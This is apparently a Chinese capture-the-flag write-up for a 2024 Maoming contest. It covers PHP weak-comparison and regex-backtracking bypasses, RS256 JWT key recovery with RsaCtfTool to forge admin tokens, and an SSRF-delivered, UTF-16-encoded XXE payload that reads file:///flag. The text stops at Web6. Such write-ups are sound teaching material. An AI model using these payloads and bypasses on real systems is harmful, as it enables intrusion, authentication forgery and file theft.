2024年茂名市首届网络安全大赛--初赛(党政组)wp


Web


Web4-初

c493e569e32142a7af8e70b26b89e8a8.png

 

if(isset($_GET['one']) && $_GET['one'] == 0 && $_GET['one'])
php弱比较,通过传入one=0a可满足条件

$query = $_SERVER['QUERY_STRING'];
if(strpos($query,'one') !== false)
$_SERVER['QUERY_STRING']获取url中‘?’后面的内容,然后检测是否包含‘one’子字符串,由于$_SERVER['QUERY_STRING']不会进行url解码,传入%6fne=0a,可满足条件

最后是
if(!is_array($two)){
    if(preg_match('/Love.*flag/is',$two) == false){
        if(strpos($two,'Love flag')!==false){

需要不满足正则匹配 /Love.*flag/is,同时又必须存在 Love flag字符串,可以使用正则回溯漏洞绕过。

脚本:
import requests

data = {'two': 'Love flag' + 'a' * 1000000}

html = requests.post('http://192.168.221.120/',params='%%36%66ne=0a' ,data=data)

print(html.text)


Web5-中


有两个账号
admin/123456
test/123456

478074da74da480e80b484ba9ee7fee8.png
登录后cookie有个token参数,用了jwt,使用rs256算法
admin
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE5Mi4xNjguMjAwLjEifQ.BysxuuRY9Kh0R2O3FOVI3igK9gcYsLmydfrSkP-fHVJu8l0mrY9iD_jf-PIcD4wSJH9r2oJqrNiJdxnm1rt6mDy7U_03Bvc6e_mH_3hH7ySf2uNddkG4wZTY92kTvwl1PQ

 

test
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoidGVzdCIsImlwIjoiMTkyLjE2OC4yMDAuMSJ9.AvXkg72Z6J8mPT5v-0dB_3cEWmwL16FCX6nNK-NGrAoetEIlqFh9NE-CmldoRagIGEDxdg00m-g-fZ8BKOfZoq5DC5ve8Ge1aCz_gWpFYgZ71AHhmwYCdqOx7Z_J-0hPtQ

登录admin会提示ip被ban了,登录ip存在jwt里面
有了两个rsa加密的jwt,可以去猜公钥

f3a2f83e87414518ac4f337e86eb1f9a.png
跑出来8个公钥

 

https://github.com/Ganapati/RsaCtfTool
python3.9 RsaCtfTool.py --publickey ./public.key --private
跑私钥

3f30ed3ee9eb44e08908b0b0e6727e7f.png

b54076cab9bd45219774b2802c0c898d.png

3ce23b5486864dccbf94abc779af39fd.png

 

点击链接

 6134f05461c74d82a13c78cfc2f85560.png

 

 

可能存在ssrf

点击test是个上传点,上传到内网8000端口

e3092bb48b5341bcbafe2109819b3b3d.png

 

可以判断处理了xml
想要触发xxe过滤了system等关键字
绕过关键字,iconv -f utf8 -t utf-16 2.xml > 3.xml 把payload进行编码上传
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>


同时用unicode编码绕过检测
{"url":"oss.jxsec.cn\u003a8000","file":"208d19e4cc6eaaac30c8ad98251b45a7.xml"}

8692b61ecc6c4de296d2808b4aff6587.png

Web6-中

 0e7a924fba6b42189803ef5911c59f06.png

&

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值